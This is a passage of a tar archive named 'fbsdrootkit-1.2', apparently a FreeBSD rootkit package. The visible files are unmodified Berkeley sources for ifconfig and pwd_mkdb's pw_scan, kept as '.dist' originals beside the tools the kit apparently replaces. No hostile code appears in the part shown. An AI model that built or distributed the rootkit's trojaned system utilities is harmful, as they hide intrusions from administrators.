*bits; register unsigned short v; { register int i, any = 0; register char c; if (bits && *bits == 8) printf("%s=%o", s, v); else printf("%s=%x", s, v); bits++; if (bits) { putchar('<'); while (i = *bits++) { if (v & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; (c = *bits) > 32; bits++) putchar(c); } else for (; *bits > 32; bits++) ; } putchar('>'); } } #define SNS(x) ((struct sockaddr_ns *) &(x)) struct sockaddr_ns *snstab[] = { SNS(ridreq.ifr_addr), SNS(addreq.ifra_addr), SNS(addreq.ifra_mask), SNS(addreq.ifra_broadaddr)}; xns_getaddr(addr, which) char *addr; { struct sockaddr_ns *sns = snstab[which]; struct ns_addr ns_addr(); sns->sns_family = AF_NS; sns->sns_len = sizeof(*sns); sns->sns_addr = ns_addr(addr); if (which == MASK) printf("Attempt to set XNS netmask will be ineffectual\n"); } #define SISO(x) ((struct sockaddr_iso *) &(x)) struct sockaddr_iso *sisotab[] = { SISO(iso_ridreq.ifr_Addr), SISO(iso_addreq.ifra_addr), SISO(iso_addreq.ifra_mask), SISO(iso_addreq.ifra_dstaddr)}; iso_getaddr(addr, which) char *addr; { register struct sockaddr_iso *siso = sisotab[which]; struct iso_addr *iso_addr(); siso->siso_addr = *iso_addr(addr); if (which == MASK) { siso->siso_len = TSEL(siso) - (caddr_t)(siso); siso->siso_nlen = 0; } else { siso->siso_len = sizeof(*siso); siso->siso_family = AF_ISO; } } setnsellength(val) char *val; { nsellength = atoi(val); if (nsellength < 0) errx(1, "Negative NSEL length is absurd"); if (afp == 0 || afp->af_af != AF_ISO) errx(1, "Setting NSEL length valid only for iso"); } fixnsel(s) register struct sockaddr_iso *s; { if (s->siso_family == 0) return; s->siso_tlen = nsellength; } adjust_nsellength() { fixnsel(sisotab[RIDADDR]); fixnsel(sisotab[ADDR]); fixnsel(sisotab[DSTADDR]); } fbsdrootkit-1.2/ifconfig/ifconfig.c.dist100600 764 764 52106 6247413132 15637 0ustar dfdf/* * Copyright (c) 1983, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * 951109 - Andrew@pubnix.net - Changed to iterative buffer growing mechanism * for ifconfig -a so all interfaces are queried. * */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1993\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ifconfig.c 8.2 (Berkeley) 2/16/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #define NSIP #include #include #include #define EON #include #include #include #include #include #include #include #include #include #include #include #include #include struct ifreq ifr, ridreq; struct ifaliasreq addreq; struct iso_ifreq iso_ridreq; struct iso_aliasreq iso_addreq; struct sockaddr_in netmask; char name[30]; int flags; int metric; int mtu; int nsellength = 1; int setaddr; int setipdst; int doalias; int clearaddr; int newaddr = 1; int s; kvm_t *kvmd; extern int errno; int setifflags(), setifaddr(), setifdstaddr(), setifnetmask(); int setifmetric(), setifmtu(), setifbroadaddr(), setifipdst(); int notealias(), setsnpaoffset(), setnsellength(), notrailers(); #define NEXTARG 0xffffff struct cmd { char *c_name; int c_parameter; /* NEXTARG means next argv */ int (*c_func)(); } cmds[] = { { "up", IFF_UP, setifflags } , { "down", -IFF_UP, setifflags }, { "trailers", -1, notrailers }, { "-trailers", 1, notrailers }, { "arp", -IFF_NOARP, setifflags }, { "-arp", IFF_NOARP, setifflags }, { "debug", IFF_DEBUG, setifflags }, { "-debug", -IFF_DEBUG, setifflags }, { "alias", IFF_UP, notealias }, { "-alias", -IFF_UP, notealias }, { "delete", -IFF_UP, notealias }, #ifdef notdef #define EN_SWABIPS 0x1000 { "swabips", EN_SWABIPS, setifflags }, { "-swabips", -EN_SWABIPS, setifflags }, #endif { "netmask", NEXTARG, setifnetmask }, { "metric", NEXTARG, setifmetric }, { "broadcast", NEXTARG, setifbroadaddr }, { "ipdst", NEXTARG, setifipdst }, { "snpaoffset", NEXTARG, setsnpaoffset }, { "nsellength", NEXTARG, setnsellength }, { "link0", IFF_LINK0, setifflags }, { "-link0", -IFF_LINK0, setifflags }, { "link1", IFF_LINK1, setifflags }, { "-link1", -IFF_LINK1, setifflags }, { "link2", IFF_LINK2, setifflags }, { "-link2", -IFF_LINK2, setifflags }, { "normal", -IFF_LINK0, setifflags }, { "compress", IFF_LINK0, setifflags }, { "noicmp", IFF_LINK1, setifflags }, { "mtu", NEXTARG, setifmtu }, { 0, 0, setifaddr }, { 0, 0, setifdstaddr }, }; /* * XNS support liberally adapted from code written at the University of * Maryland principally by James O'Toole and Chris Torek. */ int in_status(), in_getaddr(); int xns_status(), xns_getaddr(); int iso_status(), iso_getaddr(); int ether_status(); /* Known address families */ struct afswtch { char *af_name; short af_af; int (*af_status)(); int (*af_getaddr)(); int af_difaddr; int af_aifaddr; caddr_t af_ridreq; caddr_t af_addreq; } afs[] = { #define C(x) ((caddr_t) &x) { "inet", AF_INET, in_status, in_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "ns", AF_NS, xns_status, xns_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "iso", AF_ISO, iso_status, iso_getaddr, SIOCDIFADDR_ISO, SIOCAIFADDR_ISO, C(iso_ridreq), C(iso_addreq) }, { "ether", AF_INET, ether_status, NULL }, { 0, 0, 0, 0 } }; struct afswtch *afp; /*the address family being set or asked about*/ main(argc, argv) int argc; char *argv[]; { int af = AF_INET; register struct afswtch *rafp; if (argc < 2) { fprintf(stderr, "usage: ifconfig interface\n%s%s%s%s%s%s", "\t[ af [ address [ dest_addr ] ] [ up ] [ down ]", "[ netmask mask ] ]\n", "\t[ metric n ]\n", "\t[ mtu n ]\n", "\t[ arp | -arp ]\n", "\t[ link0 | -link0 ] [ link1 | -link1 ] [ link2 | -link2 ] \n"); exit(1); } argc--, argv++; strncpy(name, *argv, sizeof(name)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); argc--, argv++; if (argc > 0) { for (afp = rafp = afs; rafp->af_name; rafp++) if (strcmp(rafp->af_name, *argv) == 0) { afp = rafp; argc--; argv++; break; } rafp = afp; af = ifr.ifr_addr.sa_family = rafp->af_af; } s = socket(af, SOCK_DGRAM, 0); if (s < 0) { perror("ifconfig: socket"); exit(1); } if (strstr(name, "-a")) { char *buffer; struct ifconf ifc; struct ifreq *ifptr, *end; int ifflags, selectflag = -1; int oldbufsize, bufsize = sizeof(struct ifreq); if (strstr(name, "-au")) selectflag = 1; if (strstr(name, "-ad")) selectflag = 0; buffer = malloc(bufsize); /* allocate first buffer */ ifc.ifc_len = bufsize; /* Initial setting */ /* * Itterate through here until we don't get any more data */ do { oldbufsize = ifc.ifc_len; bufsize += 1+sizeof(struct ifreq); buffer = realloc((void *)buffer, bufsize); ifc.ifc_len = bufsize; ifc.ifc_buf = buffer; if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) { perror("ifconfig (SIOCGIFCONF)"); exit (1); } } while (ifc.ifc_len > oldbufsize); ifflags = ifc.ifc_req->ifr_flags; end = (struct ifreq *) (ifc.ifc_buf + ifc.ifc_len); ifptr = ifc.ifc_req; while (ifptr < end) { sprintf(ifr.ifr_name,"%s",ifptr->ifr_name); sprintf(name,"%s",ifptr->ifr_name); close(s); if ((s = socket(af, SOCK_DGRAM, 0)) < 0) { perror("ifconfig: socket"); exit(1); } if (ifptr->ifr_flags == ifflags) ifconfig(argc,argv,af,rafp,selectflag); if(ifptr->ifr_addr.sa_len) /* Dohw! */ ifptr = (struct ifreq *) ((caddr_t) ifptr + ifptr->ifr_addr.sa_len - sizeof(struct sockaddr)); ifptr++; } free(buffer); } else ifconfig(argc,argv,af,rafp, -1); exit (0); } ifconfig(argc,argv,af,rafp,flag) int argc; char *argv[]; int af; struct afswtch *rafp; int flag; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } switch(flag) { case 0: if (ifr.ifr_flags & IFF_UP) return(0); break; case 1: if (!(ifr.ifr_flags & IFF_UP)) return(0); break; case -1: default: break; } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); flags = ifr.ifr_flags; if (ioctl(s, SIOCGIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMETRIC)"); else metric = ifr.ifr_metric; if (ioctl(s, SIOCGIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMTU)"); else mtu = ifr.ifr_mtu; if (argc == 0) { status(); return(0); } while (argc > 0) { register struct cmd *p; for (p = cmds; p->c_name; p++) if (strcmp(*argv, p->c_name) == 0) break; if (p->c_name == 0 && setaddr) p++; /* got src, do dst */ if (p->c_func) { if (p->c_parameter == NEXTARG) { if (argv[1] == NULL) errx(1, "'%s' requires argument", p->c_name); (*p->c_func)(argv[1]); argc--, argv++; } else (*p->c_func)(*argv, p->c_parameter); } argc--, argv++; } if (af == AF_ISO) adjust_nsellength(); if (setipdst && af==AF_NS) { struct nsip_req rq; int size = sizeof(rq); rq.rq_ns = addreq.ifra_addr; rq.rq_ip = addreq.ifra_dstaddr; if (setsockopt(s, 0, SO_NSIP_ROUTE, &rq, size) < 0) Perror("Encapsulation Routing"); } if (clearaddr) { int ret; strncpy(rafp->af_ridreq, name, sizeof ifr.ifr_name); if ((ret = ioctl(s, rafp->af_difaddr, rafp->af_ridreq)) < 0) { if (errno == EADDRNOTAVAIL && (doalias >= 0)) { /* means no previous address for interface */ } else Perror("ioctl (SIOCDIFADDR)"); } } if (newaddr) { strncpy(rafp->af_addreq, name, sizeof ifr.ifr_name); if (ioctl(s, rafp->af_aifaddr, rafp->af_addreq) < 0) Perror("ioctl (SIOCAIFADDR)"); } return(0); } #define RIDADDR 0 #define ADDR 1 #define MASK 2 #define DSTADDR 3 /*ARGSUSED*/ setifaddr(addr, param) char *addr; short param; { /* * Delay the ioctl to set the interface addr until flags are all set. * The address interpretation may depend on the flags, * and the flags may change when the address is set. */ setaddr++; if (doalias == 0) clearaddr = 1; (*afp->af_getaddr)(addr, (doalias >= 0 ? ADDR : RIDADDR)); } setifnetmask(addr) char *addr; { (*afp->af_getaddr)(addr, MASK); } setifbroadaddr(addr) char *addr; { (*afp->af_getaddr)(addr, DSTADDR); } setifipdst(addr) char *addr; { in_getaddr(addr, DSTADDR); setipdst++; clearaddr = 0; newaddr = 0; } #define rqtosa(x) (&(((struct ifreq *)(afp->x))->ifr_addr)) /*ARGSUSED*/ notealias(addr, param) char *addr; { if (setaddr && doalias == 0 && param < 0) bcopy((caddr_t)rqtosa(af_addreq), (caddr_t)rqtosa(af_ridreq), rqtosa(af_addreq)->sa_len); doalias = param; if (param < 0) { clearaddr = 1; newaddr = 0; } else clearaddr = 0; } /*ARGSUSED*/ notrailers(vname, value) char *vname; int value; { printf("Note: trailers are no longer sent, but always received\n"); } /*ARGSUSED*/ setifdstaddr(addr, param) char *addr; int param; { (*afp->af_getaddr)(addr, DSTADDR); } setifflags(vname, value) char *vname; short value; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); flags = ifr.ifr_flags; if (value < 0) { value = -value; flags &= ~value; } else flags |= value; ifr.ifr_flags = flags; if (ioctl(s, SIOCSIFFLAGS, (caddr_t)&ifr) < 0) Perror(vname); } setifmetric(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_metric = atoi(val); if (ioctl(s, SIOCSIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (set metric)"); } setifmtu(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_mtu = atoi(val); if (ioctl(s, SIOCSIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (set mtu)"); } setsnpaoffset(val) char *val; { iso_addreq.ifra_snpaoffset = atoi(val); } #define IFFBITS \ "\020\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING\10NOARP\ \11PROMISC\12ALLMULTI\13OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2\20MULTICAST" /* * Print the status of the interface. If an address family was * specified, show it and it only; otherwise, show them all. */ status() { register struct afswtch *p = afp; short af = ifr.ifr_addr.sa_family; printf("%s: ", name); printb("flags", flags, IFFBITS); if (metric) printf(" metric %d", metric); if (mtu) printf(" mtu %d", mtu); putchar('\n'); if ((p = afp) != NULL) { (*p->af_status)(1); } else for (p = afs; p->af_name; p++) { ifr.ifr_addr.sa_family = p->af_af; (*p->af_status)(0); } } in_status(force) int force; { struct sockaddr_in *sin; char *inet_ntoa(); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } sin = (struct sockaddr_in *)&ifr.ifr_addr; printf("\tinet %s ", inet_ntoa(sin->sin_addr)); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFNETMASK, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK)"); bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else netmask.sin_addr = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr; if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_dstaddr; printf("--> %s ", inet_ntoa(sin->sin_addr)); } printf("netmask 0x%x ", ntohl(netmask.sin_addr.s_addr)); if (flags & IFF_BROADCAST) { if (ioctl(s, SIOCGIFBRDADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_addr; if (sin->sin_addr.s_addr != 0) printf("broadcast %s", inet_ntoa(sin->sin_addr)); } putchar('\n'); } xns_status(force) int force; { struct sockaddr_ns *sns; close(s); s = socket(AF_NS, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); sns = (struct sockaddr_ns *)&ifr.ifr_addr; printf("\tns %s ", ns_ntoa(sns->sns_addr)); if (flags & IFF_POINTOPOINT) { /* by W. Nesheim@Cornell */ if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else Perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sns = (struct sockaddr_ns *)&ifr.ifr_dstaddr; printf("--> %s ", ns_ntoa(sns->sns_addr)); } putchar('\n'); } iso_status(force) int force; { struct sockaddr_iso *siso; struct iso_ifreq ifr; close(s); s = socket(AF_ISO, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } bzero((caddr_t)&ifr, sizeof(ifr)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); } else { perror("ioctl (SIOCGIFADDR_ISO)"); exit(1); } } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); siso = &ifr.ifr_Addr; printf("\tiso %s ", iso_ntoa(&siso->siso_addr)); if (ioctl(s, SIOCGIFNETMASK_ISO, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK_ISO)"); } else { printf(" netmask %s ", iso_ntoa(&siso->siso_addr)); } if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); else Perror("ioctl (SIOCGIFDSTADDR_ISO)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); siso = &ifr.ifr_Addr; printf("--> %s ", iso_ntoa(&siso->siso_addr)); } putchar('\n'); } kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) return (-1); return (0); } /* Unashamedly stolen from netstat -- maybe someday we can us sysctl() */ ether_status() { struct nlist nl[] = { { "_ifnet" } , "" }; u_long addr, addr2; struct ifnet ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; char *cp; struct sockaddr *sa; struct sockaddr_dl *sdl; int n,m; char ifacename[IFNAMSIZ]; /* * If we fail here it probably means we don't have permission to * read /dev/kmem. Best to just silently bail out. If we have * an error *after* we succeed in opening /dev/kmem, then we * should report it. */ if ((kvmd = kvm_open(NULL,NULL,NULL,O_RDONLY,NULL)) == NULL) return; if (kvm_nlist(kvmd, nl) < 0 || nl[0].n_type == 0) { perror("ifconfig: kvm_nlist()"); return; } if (kread(nl[0].n_value, (char *)&addr, sizeof(addr))) { perror("_ifnet"); return; } addr2 = 0; while (addr || addr2) { if (addr2 == 0) { if (kread(addr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, ifacename, IFNAMSIZ)){ perror("ifconfig: kvm_read()"); return; } addr = (u_long)ifnet.if_next; addr2 = (u_long)ifnet.if_addrlist; } if (kread(addr2, (char *)&ifaddr, sizeof ifaddr)) { addr2 = 0; continue; } sprintf(ifacename,"%s%d",ifacename, ifnet.if_unit); if (!strncmp(name, ifacename, strlen(name))) { #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(addr2)) + CP(&ifaddr); sa = (struct sockaddr *)cp; if (sa->sa_family == AF_LINK) { sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); if ((n = sdl->sdl_alen) > 0) { printf ("\tether "); while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? ':' : ' '); putchar('\n'); } break; } } addr2 = (u_long)ifaddr.ifa.ifa_next; } kvm_close(kvmd); } Perror(cmd) char *cmd; { extern int errno; switch (errno) { case ENXIO: errx(1, "%s: no such interface", cmd); break; case EPERM: errx(1, "%s: permission denied", cmd); break; default: err(1, "%s", cmd); } } struct in_addr inet_makeaddr(); #define SIN(x) ((struct sockaddr_in *) &(x)) struct sockaddr_in *sintab[] = { SIN(ridreq.ifr_addr), SIN(addreq.ifra_addr), SIN(addreq.ifra_mask), SIN(addreq.ifra_broadaddr)}; in_getaddr(s, which) char *s; { register struct sockaddr_in *sin = sintab[which]; struct hostent *hp; struct netent *np; int val; sin->sin_len = sizeof(*sin); if (which != MASK) sin->sin_family = AF_INET; if (inet_aton(s, &sin->sin_addr)) ; else if (hp = gethostbyname(s)) bcopy(hp->h_addr, (char *)&sin->sin_addr, hp->h_length); else if (np = getnetbyname(s)) sin->sin_addr = inet_makeaddr(np->n_net, INADDR_ANY); else errx(1, "%s: bad value", s); } /* * Print a value a la the %b format of the kernel's printf */ printb(s, v, bits) char *s; register char *bits; register unsigned short v; { register int i, any = 0; register char c; if (bits && *bits == 8) printf("%s=%o", s, v); else printf("%s=%x", s, v); bits++; if (bits) { putchar('<'); while (i = *bits++) { if (v & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; (c = *bits) > 32; bits++) putchar(c); } else for (; *bits > 32; bits++) ; } putchar('>'); } } #define SNS(x) ((struct sockaddr_ns *) &(x)) struct sockaddr_ns *snstab[] = { SNS(ridreq.ifr_addr), SNS(addreq.ifra_addr), SNS(addreq.ifra_mask), SNS(addreq.ifra_broadaddr)}; xns_getaddr(addr, which) char *addr; { struct sockaddr_ns *sns = snstab[which]; struct ns_addr ns_addr(); sns->sns_family = AF_NS; sns->sns_len = sizeof(*sns); sns->sns_addr = ns_addr(addr); if (which == MASK) printf("Attempt to set XNS netmask will be ineffectual\n"); } #define SISO(x) ((struct sockaddr_iso *) &(x)) struct sockaddr_iso *sisotab[] = { SISO(iso_ridreq.ifr_Addr), SISO(iso_addreq.ifra_addr), SISO(iso_addreq.ifra_mask), SISO(iso_addreq.ifra_dstaddr)}; iso_getaddr(addr, which) char *addr; { register struct sockaddr_iso *siso = sisotab[which]; struct iso_addr *iso_addr(); siso->siso_addr = *iso_addr(addr); if (which == MASK) { siso->siso_len = TSEL(siso) - (caddr_t)(siso); siso->siso_nlen = 0; } else { siso->siso_len = sizeof(*siso); siso->siso_family = AF_ISO; } } setnsellength(val) char *val; { nsellength = atoi(val); if (nsellength < 0) errx(1, "Negative NSEL length is absurd"); if (afp == 0 || afp->af_af != AF_ISO) errx(1, "Setting NSEL length valid only for iso"); } fixnsel(s) register struct sockaddr_iso *s; { if (s->siso_family == 0) return; s->siso_tlen = nsellength; } adjust_nsellength() { fixnsel(sisotab[RIDADDR]); fixnsel(sisotab[ADDR]); fixnsel(sisotab[DSTADDR]); } fbsdrootkit-1.2/ifconfig/Makefile.dist100600 764 764 176 6257406127 15316 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/5/93 PROG= ifconfig MAN8= ifconfig.8 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/pwd_mkdb/ 40700 764 764 0 6257562504 12636 5ustar dfdffbsdrootkit-1.2/pwd_mkdb/Makefile100600 764 764 171 5620536613 14347 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= pwd_mkdb SRCS= pw_scan.c pwd_mkdb.c MAN8= pwd_mkdb.8 .include fbsdrootkit-1.2/pwd_mkdb/pw_scan.c100600 764 764 10123 5762565231 14550 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)pw_scan.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This module is used to "verify" password entries by chpass(1) and * pwd_mkdb(8). */ #include #include #include #include #include #include #include #include #include #include "pw_scan.h" int pw_scan(bp, pw) char *bp; struct passwd *pw; { long id; int root; char *p, *sh; pw->pw_fields = 0; if (!(pw->pw_name = strsep(&bp, ":"))) /* login */ goto fmt; root = !strcmp(pw->pw_name, "root"); if(pw->pw_name[0] && (pw->pw_name[0] != '+' || pw->pw_name[1] == '\0')) pw->pw_fields |= _PWF_NAME; if (!(pw->pw_passwd = strsep(&bp, ":"))) /* passwd */ goto fmt; if(pw->pw_passwd[0]) pw->pw_fields |= _PWF_PASSWD; if (!(p = strsep(&bp, ":"))) /* uid */ goto fmt; if(p[0]) pw->pw_fields |= _PWF_UID; id = atol(p); if (root && id) { warnx("root uid should be 0"); return (0); } if (id > USHRT_MAX) { warnx("%s > max uid value (%d)", p, USHRT_MAX); return (0); } pw->pw_uid = id; if (!(p = strsep(&bp, ":"))) /* gid */ goto fmt; if(p[0]) pw->pw_fields |= _PWF_GID; id = atol(p); if (id > USHRT_MAX) { warnx("%s > max gid value (%d)", p, USHRT_MAX); return (0); } pw->pw_gid = id; pw->pw_class = strsep(&bp, ":"); /* class */ if(pw->pw_class[0]) pw->pw_fields |= _PWF_CLASS; if (!(p = strsep(&bp, ":"))) /* change */ goto fmt; if(p[0]) pw->pw_fields |= _PWF_CHANGE; pw->pw_change = atol(p); if (!(p = strsep(&bp, ":"))) /* expire */ goto fmt; if(p[0]) pw->pw_fields |= _PWF_EXPIRE; pw->pw_expire = atol(p); if (!(pw->pw_gecos = strsep(&bp, ":"))) /* gecos */ goto fmt; if(pw->pw_gecos[0]) pw->pw_fields |= _PWF_GECOS; if (!(pw->pw_dir = strsep(&bp, ":"))) /* directory */ goto fmt; if(pw->pw_dir[0]) pw->pw_fields |= _PWF_DIR; if (!(pw->pw_shell = strsep(&bp, ":"))) /* shell */ goto fmt; p = pw->pw_shell; if (root && *p) /* empty == /bin/sh */ for (setusershell();;) { if (!(sh = getusershell())) { warnx("warning, unknown root shell"); break; } if (!strcmp(p, sh)) break; } if(p[0]) pw->pw_fields |= _PWF_SHELL; if (p = strsep(&bp, ":")) { /* too many */ fmt: warnx("corrupted entry"); return (0); } return (1); } fbsdrootkit-1.2/pwd_mkdb/pw_scan.h100600 764 764 3600 5571103176 14531 0ustar dfdf/*- * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 